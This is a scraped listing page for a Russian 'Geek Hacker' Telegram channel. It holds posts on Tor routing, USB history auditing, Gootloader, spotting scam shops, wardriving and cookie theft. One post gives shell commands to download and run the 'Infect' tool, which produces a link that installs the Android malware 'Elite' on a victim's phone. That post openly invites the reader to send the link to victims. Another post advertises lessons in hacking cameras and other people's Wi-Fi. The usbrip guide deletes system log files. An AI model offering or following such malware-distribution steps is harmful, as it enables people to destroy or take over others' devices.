Получи случайную криптовалюту за регистрацию!

Geek Hacker

Логотип телеграм канала @geekhackers — Geek Hacker G
Логотип телеграм канала @geekhackers — Geek Hacker
Адрес канала: @geekhackers
Категории: Технологии
Язык: Русский
Страна: Россия
Количество подписчиков: 1.15K
Описание канала:

Информационная безопасность, хакерские атаки, СИ, анонимность и вирусы.
В руках умелого человека даже обычный компьютер превращается в кибероружие.
Чат канала 💬 @geekhackers_chat
Сотрудничество, вопросы, предложения, пожелания - @geekhackers_bot

Рейтинги и Отзывы

3.00

2 отзыва

Оценить канал geekhackers и оставить отзыв — могут только зарегестрированные пользователи. Все отзывы проходят модерацию.

5 звезд

0

4 звезд

1

3 звезд

0

2 звезд

1

1 звезд

0


Последние сообщения 6

2021-04-24 18:46:20 ​​Как создать или перенести свой HTML сайт на Google drive? |Бесплатно|

При разработке сайтов часто возникает необходимость разместить верстку на каком-либо хостинге в сети. Знаете ли вы, что вы можете использовать Google Диск для размещения и создания своих веб-сайтов? Это работает только для статических сайтов, но очень удобно, когда вам нужно поделиться идеей с кем-то еще!

Файл index.html – это файл, который будет обслуживаться, когда кто-то захочет получить доступ к вашему веб-сайту.

Открытие HTML с Google Drive

На своем Google Диске нажмите «Создать» и добавьте папку.
Затем щелкните правой кнопкой мыши на папке и выберите опцию «Поделиться».
В этом всплывающем окне нажмите на ссылку «Дополнительно».
В разделе «У кого есть доступ» нажмите «Изменить» и измените на «Общедоступный в Интернете – любой, кто находится в Интернете, может найти и просмотреть».
Теперь откройте новую вкладку в вашем браузере и введите drv.tw
Выберите Google Диск.
Войдите в систему, используя адрес электронной почты, связанный с учетной записью Google Диск, куда вы загрузили файлы своего веб-сайта

1. Нажмите разрешить.
2. Нажмите на ссылку в панели администратора.

Например, если вам нужно будет залить в сеть сайт-визитку с вашими услугами этот способ выручит вас. Пару минут и ваш сайт в интернете без какой либо мороки. Ссылку на созданный таким образом сайт можно передавать другим пользователям, публиковать в социальных сетях.

DriveToWeb упрощает создание контента, позволяя любому быстро запустить веб-сайт, используя файлы, хранящиеся на популярных облачных дисках, таких как Google Диск и Microsoft OneDrive (включая OneDrive для бизнеса). Предприниматели, разработчики, преподаватели и студенты во всем мире обнаружили большие преимущества использования DriveToWeb по сравнению с обычными услугами веб-хостинга. Если Вы захотите изменить домен, то просто настройте редирект на ссылку предоставленную сервисом!

А если еще и установить программу Google Drive на компьютер, так вообще удобно пользоваться этим способом, достаточно лишь нужные файлы разместить в специальной папке у себя на компьютере, после чего произойдет автоматическая синхронизация с сервером Google и материал уже будет находится в сети.

Geek Hacker

#полезное #вебразработка
160 viewsedited  15:46
Открыть/Комментировать
2021-04-23 12:01:05 ​​Создаем анонимный роутер с помощью Kali Linux

Tor Router позволяет вам использовать сеть TOR в качестве прозрачного прокси-сервера и отправлять весь ваш трафик, включая DNS-запросы, через TOR.

Tor router не трогает системные файлы, как это делают остальные инструменты для маршрутизации трафика. Причина этого в том, что нет необходимости изменять файлы для маршрутизации трафика, так как сбой в скрипте может нарушить ваше системное соединение.

Установка и эксплуатация инструмента

Открываем терминал в Kali Linux и вводим команду для обновления пакетов:

apt-get && apt-get upgrade

Устанавливаем сервис TOR:

sudo apt install tor
git clone https://github.com/edu4rdshl/tor-router
cd tor-router/files

Открываем файл torrc через текстовый редактор:

sudo nano /etc/tor/torrc

И добавляем в файл следующий текст:

# Seting up TOR transparent proxy for tor-router
VirtualAddrNetwork 10.192.0.0/10
AutomapHostsOnResolve 1
TransPort 9040
DNSPort 5353

После этого перезапускаем службу TOR:

sudo systemctl restart tor

И запускаем инструмент:

sudo ./tor-router

Теперь весь ваш трафик проходит через сеть TOR. Проверить это можно на следующих страницах: https://check.torproject.org
А для тестов DNS: https://dnsleaktest.com

Geek Hacker

#анонимность
147 views09:01
Открыть/Комментировать
2021-04-22 14:00:24 ​​Просматриваем историю USB-устройств

Несанкционированное подключение какого-либо USB-устройства может свидетельствовать тому, что информация на вашем компьютер находится в потенциальной опасности. Например, злоумышленник мог подключить к компьютеру специальное устройство, чтобы получить доступ к персональной информации.

В данном посте мы разберемся с программой usbrip, с помощью которой можно посмотреть историю подключения USB-устройств к компьютеру на Linux.

Установка инструмента

Открываем терминал и вводим команду для обновления пакетов:

sudo apt-get update && apt-get upgrade
sudo apt-get install python3-venv p7zip-full -y
sudo apt-get install git
git clone https://github.com/snovvcrash/usbrip
cd usbrip

И запускаем скрипт установки:

sudo -H python3 -m pip install --upgrade usbrip

После этого ожидаем окончание процесса установки.

Корректировка системного журнала

Перед тем, как начать работу с утилитой, нам нужно изменить структуру файла, который содержит в себе всю историю USB-устройств. Для этого открываем файл rsyslog.conf с помощью текстового редактора nano:

sudo nano /etc/rsyslog.conf

Находим строку $ActionFileDefaultTemplate RSYSLOG_TraditionalFileFormat и ставим перед ней символ #.

Далее добавляем пользовательский файл с помощью команды:

echo '$ActionFileDefaultTemplate RSYSLOG_FileFormat' | sudo tee /etc/rsyslog.d/usbrip.conf

И удаляем существующие файлы системного журнала:

sudo rm -f /var/log/syslog* /var/log/messages*

Перезапускаем службу ведения логов:

sudo systemctl restart rsyslog

Теперь мы можем анализировать все собранные данные с помощью usbrip.

Использование утилиты

После того, как процесс установки и корректировки специального файла будет завершен, запускаем инструмент с помощью следующей команды:

usbrip events history

Данная программа сама найдет системный журнал и спросит, хотим ли мы вывести данные на экран или же сохранить информацию в файл JSON. Если мы хотим вывести информацию на экран, то достаточно нажать клавишу ENTER, т.к первый вариант установлен программой по умолчанию.

Теперь после выбора соответствующего варианта перед нами появится таблица с информацией о всех когда-либо подключенных устройствах.

Geek Hacker

#полезное #лайфхак
131 views11:00
Открыть/Комментировать
2021-04-16 09:01:06 ​​Security Vision @svplatform - канал ведущей российской группы компаний в сфере информационной безопасности, специализирующейся на сегменте ИТ-систем класса SOC, SGRC, IRP, SOAR. Свежие новости, статьи и аналитика по ИБ. Анонсы семинаров и мероприятий. Присоединяйтесь, будьте в курсе самых последних событий! @svplatform
223 views06:01
Открыть/Комментировать
2021-04-04 14:00:12 ​​Открыл ссылку и убил свой смартфон

Об опасностях неизвестных ссылок, я рассказывал уже не раз. Прослушивание, отслеживание местоположения, доступ к камере и т.д., всё это последствия перехода по неизвестным ссылкам. Сегодня я расскажу, как просто перейдя по ссылке, вы можете получить на свое устройство один из опаснейших Android - вирусов Elite.

Я покажу, как абсолютно любой человек может сгенерировать данную ссылку и в дальнейшем, распространив её, убить не один десяток смартфонов.

Открываем терминал и вводим:

apt update
apt upgrade

Установим необходимые инструменты

apt install python
apt install git
pip install lolcat

Теперь скачиваем и запускаем саму программу

git clone https://github.com/noob-hackers/Infect
cd Infect
bash infect.sh

Появится окно утилиты, после чего пишем 1, а затем 3 раза жмем Enter. Получаем ссылку, которую затем отправляем жертве.

После открытия данной ссылки на ваше устройство автоматически скачивается вирус Elite.

Конечно, без социальной инженерии тут никуда. Я не буду рассказывать какими способами можно убедить жертву установить данное приложение, но будьте уверены, способов достаточно.

Ну а кого-то накажет собственное любопытство, потому как после установки Elite, смартфону придет конец!

Поэтому, друзья, будьте осторожны не переходите по неизвестным ссылкам и тем более не устанавливайте подозрительные приложения.

Geek Hacker

#взлом #android #virus #вирус
284 views11:00
Открыть/Комментировать
2021-04-02 13:42:31 Как Google используется для доставки вредоносных программ?

Миллиарды людей ежедневно доверяют сервисам Google. От быстрого поиска в интернете до электронной почты и инструментов повышения производительности-Google является неотъемлемой частью повседневной жизни.

Неудивительно, что хакеры тратят много времени и усилий, пытаясь взломать Google или найти способ использовать свои сервисы. И так это с новой атакой, которая используется для установки вредоносных программ на компьютерах ничего не подозревающих жертв.

Пополнение результатов поиска Google

Цель каждого владельца сайта-попасть в топ результатов поиска Google. Чем ближе ваш сайт находится к вершине результатов, тем больше вероятность того, что кто-то щелкнет и купит ваши продукты и услуги.

Алгоритмы Google настолько точны, что верхний результат почти наверняка даст нам то, что мы хотим, поэтому мы обычно нажимаем на верхнюю ссылку. И мы редко думаем дважды, прежде чем сделать это.

Заражение высокопроизводительных веб-сайтов

Хакеры теперь используют наши привычки поиска против нас. Они взламывают высокоэффективные веб-сайты и используют их для заражения ничего не подозревающих пользователей вредоносным вариантом под названием Gootloader.

Получив регистрационные данные для высокоэффективного веб-сайта, преступники создают несколько новых страниц. Каждый из них нацелен на определенный поисковый запрос – такую фразу вы бы ввели в Google, например: "добавляет ли бассейн ценность моему дому?’. Это могут быть не очень популярные поисковые запросы, но именно поэтому они так быстро поднимаются на вершину поисковых страниц Google.

Остерегайтесь загрузки zip файла

Когда пользователь переходит через Google, страница предоставляет некоторую базовую информацию об их поисковом запросе, но чтобы узнать больше, они должны загрузить zip – файл. К счастью, имя zip-файла совпадает с их запросом (swimming_pool_house_value.zip), что делает его еще более убедительным.

Но как только zip-файл открыт, вредоносная программа Gootloader заражает компьютер пользователя. Ущерб варьируется, но вирус может зашифровать файлы или украсть конфиденциальную информацию, такую как номера кредитных карт и пароли.

Geek Hacker

#новости
251 views10:42
Открыть/Комментировать
2021-03-28 18:30:32 ​​Взлом камер и отправка писем с чужой почты

Для того чтоб стать хакером не нужны большие познания и крутое оборудование.

Достаточно иметь пи себе ноутбук и быть подписанным на Geek Hacker

Там ты найдёшь простые уроки по взлому, тайны социальных сетей, секреты анонимности в интернете и многое другое.

Давно хотел узнать, что о тебе пишут твои друзья или взломать чужой WI-FI? Это твой шанс @geekhackers

P.S В заголовке не кликбейт, там и правда есть подобные уроки по этому делу
273 views15:30
Открыть/Комментировать
2021-03-27 16:56:32 ​​Как вычислить мошеннический сайт?

В сети полно злоумышленников, которые жаждут получить ваши денежки, а затем раствориться во всемирной паутине. Как понять, реальный ли перед вами интернет-магазин или поддельный?

1. Очень низкая цена!

Почему мошенникам удается обманывать людей? Потому что люди хотят получить товар за как можно меньшую стоимость. Из-за этого они видят на сайтах только огромные скидки и низкие цены, отключая разум и не замечая нестыковок.
Скидки до 90% возможны, но это повод насторожиться. Сравните, сколько аналогичный товар стоит в других магазинах. Сегодня цены в разных магазинах не сильно отличаются.

2. Фейковые сайты

Это сайты, которые подделываются под сайты популярных брендов. Схожий дизайн, схожее название сайта в адресной строке — из-за этого невнимательным людям кажется, что они находятся в интернет-магазине известной компании.
Некоторые антивирусы имеют базу таких поддельных сайтов и своевременно об этом предупреждают.

3. Сайт не имеет протокол HTTPS

Все серьезные сайты, продающие что-либо, работают только через протокол HTTPS (адрес сайта имеет вид https://САЙТ). Если интернет-магазин работает через HTTP, мы советуем пройти мимо него.
Наличие HTTPS не говорит, что сайт не мошеннический. Этот протокол обеспечивает защиту от ряда сетевых атак, но никак не связан с содержимым сайта. HTTPS могут спокойно купить злоумышленники для своего сайта.

4. Предоплата

Многие российские магазины готовы работать по постоплате. Вы заказываете товар, получаете его в точке выдачи, проверяете и оплачиваете. При этом вы ничем не рискуете. Маленькие интернет-магазины не всегда работают по такой схеме и часто требуют предоплату. Это не всегда мошенники, но риск обмана выше. Зарубежные магазины обычно работают по предоплате.

А вот теперь самое интересное!

5. Проверьте сайт
В сети полно сервисов, которые бесплатно выдадут вам подробный отчет о сайте. Например, тут: https://pr-cy.ru/. У нормального сайта будут страницы в социальных сетях, присутствовать индексация в Яндексе и Гугле и т.д.
Заодно проверьте, на кого сайт зарегистрирован, давно ли он существует в интернете и т.п.. Подойдет любой Whois-сервис (https://www.nic.ru/whois/). Если сайт зарегистрирован недавно (тем более, несколько дней назад), лучше ему не доверять.

6. Поищите отзывы

Вбейте в Яндексе или Гугле название интернет-магазина и добавьте слово «отзывы». Если их нет (неважно, положительные они или отрицательные), проходим мимо. Если много плохих отзывов, это тоже повод задуматься.

Разумеется, это далеко не все возможные способы для проверки надежности интернет-магазина. Мы не ставили цель собрать их все. Но основные тут перечислены.

Geek Hacker

#antiscam #scam #osint #web
261 views13:56
Открыть/Комментировать
2021-03-18 17:00:07 ​​Wardriving: Что это такое и как вы можете это обнаружить?

Истоки wardriving можно проследить до взлома, сделанного Мэтью Бродериком в фильме “WarGames.” В фильме он набрал все телефонные номера в этом районе, чтобы найти все существующие компьютеры. В 2001 году этот процесс превратился в отображение точек доступа или wardriving, который включает в себя поиск уязвимых сетей Wi-Fi для использования. Хотя нет никаких конкретных законов об охране, полученные данные могут быть использованы для использования незащищенных сетей, что становится серой зоной защиты личной конфиденциальности.

Что такое Wardriving?

Wardriving состоит из физического поиска беспроводных сетей с уязвимостями от движущегося транспортного средства и отображения точек беспроводного доступа.

Wardrivers будет использовать аппаратное и программное обеспечение для поиска сигналов Wi-Fi в определенной области. Они могут намереваться найти только одну сеть или каждую сеть в пределах области. Как только сети будут обнаружены, wardrivers будет записывать местоположение уязвимых сетей и может передавать информацию сторонним веб-сайтам и приложениям для создания цифровых карт.

Есть три основные причины, по которым охранники ищут незащищенный Wi-Fi. Первый-это кража личной и банковской информации. Во-вторых, использовать вашу сеть для преступной деятельности, за которую вы, как владелец сети, несете ответственность. Последняя причина заключается в том, чтобы найти недостатки безопасности сети. Этические хакеры делают это с помощью wardriving с целью поиска уязвимостей для повышения общей безопасности.

Программное обеспечение, используемое для Wardriving

Wardriving в малом масштабе можно сделать с помощью простого приложения на смартфоне. Более крупные атаки, однако, обычно требуют целую установку с программным и аппаратным обеспечением, специально разработанным для атаки. Снаряжение включает в себя:

Программное обеспечение или приложение Wardriving: популярные программы wardriving включают iStumbler, KisMAC, CoWPAtty, InSSIDer, WiGLE, NetStumbler, WiFi-Where и WiFiphisher.
GPS: GPS, будь то со смартфона или автономного устройства, помогает wardrivers регистрировать местоположение беспроводных точек доступа.
Беспроводная сетевая карта и антенна: в то время как некоторые охранники используют встроенную антенну своего телефона, некоторые будут использовать беспроводную сетевую карту или антенну для улучшения возможностей сканирования.
Смартфон или ноутбук: может использоваться для запуска картографического программного обеспечения точки доступа.

Как предотвратить Wardriving?

Надзиратели обычно занимаются этим видом взлома с преступным намерением. Хотя некоторые методы wardriving безвредны, существует также потенциал для хакеров, чтобы использовать вашу сеть для совершения онлайн-преступлений с подключением, зарегистрированным для вас, или украсть личные данные с целью эксплуатации. В любом случае, это лучшая практика для защиты вашей сети Wi-Fi от этих типов нарушений.

Включите шифрование: выберите самый высокий протокол сетевой безопасности при выборе WEP, WPA и WPA2 и никогда не оставляйте свою сеть открытой или без протокола безопасности.
Обновление пароля: измените пароль по умолчанию на вашем маршрутизаторе и используйте многофакторную аутентификацию, если она доступна.
Добавление гостевой сети: настройте гостевую сеть Wi-Fi для посетителей и интеллектуальные технологии, которые подключаются к интернету, чтобы ограничить доступ этих менее защищенных устройств.
Используйте Брандмауэр: брандмауэры блокируют несанкционированную связь и любые попытки доступа к вашей системе.
Обновление устройств: Всегда устанавливайте обновления, чтобы обеспечить самые современные исправления и безопасность вашего оборудования и программного обеспечения.

#интересное

Geek Hacker
263 views14:00
Открыть/Комментировать
2021-03-17 14:00:09 ​​Как хакеры крадут ваши файлы cookie?

Файлы cookie могут делать гораздо больше, чем просто отслеживать вашу активность в интернете. Теперь, похоже, хакеры нашли способ украсть и ваши пароли.

Что такое компьютерные файлы cookie?

Файл cookie-это крошечный файл, который веб-сайты хранят на вашем компьютере. Обычно они совершенно безвредны – и весьма полезны. На самом деле, многие веб-сайты, которые вы используете каждый день, полагаются на файлы cookie для правильной работы.

Для чего используются файлы cookie?

Файлы cookie были разработаны для того, чтобы быть надежным механизмом для веб-сайтов, чтобы запоминать информацию или записывать историю посещений пользователей. Эти крошечные текстовые файлы можно использовать для хранения регистрационной информации, информации о кредитной карте и помочь рекламодателям показывать рекламу, которая, по их мнению, будет соответствовать вашим предпочтениям.

Файлы cookie могут быть полезны, например, экономя время на ввод ранее посещенной информации для входа на веб-сайт. Файлы cookie напрямую не отображают пароли, вместо этого они содержат хэш, который хранит ваш пароль. Когда пароль был хэширован, он был скремблирован так, что только веб-сайт, с которого он пришел, может его прочитать. Сайт использует уникальный алгоритм шифрования для кодирования и декодирования хэша.

Зачем хакерам нужны ваши файлы cookie?

Обычно хакеры любят красть пароли, но кража ваших файлов cookie может быть так же хороша. Установив ваши файлы cookie с хэшированными паролями в свой веб-браузер, преступник может немедленно получить доступ к вашей учетнойзаписи , не требуя входа в систему.

Ваши файлы cookie могут быть использованы для легкого компрометации социальных сетей, электронной почты и многих других сервисов.

Как хакеры крадут файлы cookie?

Если хакеры могут получить доступ к вашему компьютеру или вашей сети, они, вероятно, могут украсть ваши файлы cookie. Иногда они также могут украсть их непосредственно с небезопасного веб-сервера.

Люди становятся умнее в защите своих компьютеров от вредоносных программ, например, устанавливая авторитетное антивирусное решение (вы можете скачать бесплатную пробную версию Panda Dome здесь). В результате преступники вынуждены прибегать к более совершенным методам, таким как кража информации, проходящей через общедоступные сети Wi-Fi .

Все, что нужно хакеру для взлома ваших файлов cookie, - это расширение Firefox под названием Firesheep. Firesheep-это расширение, которое использует технологию обнаружения и копирования файлов cookie, отправляемых по беспроводной сети. Когда расширение обнаруживает файлы cookie, оно создает список на компьютере хакера. Затем они могут просто нажать на куки, и он регистрируется на веб-сайте в качестве ничего не подозревающего пользователя.

#cookie

Geek Hacker
250 views11:00
Открыть/Комментировать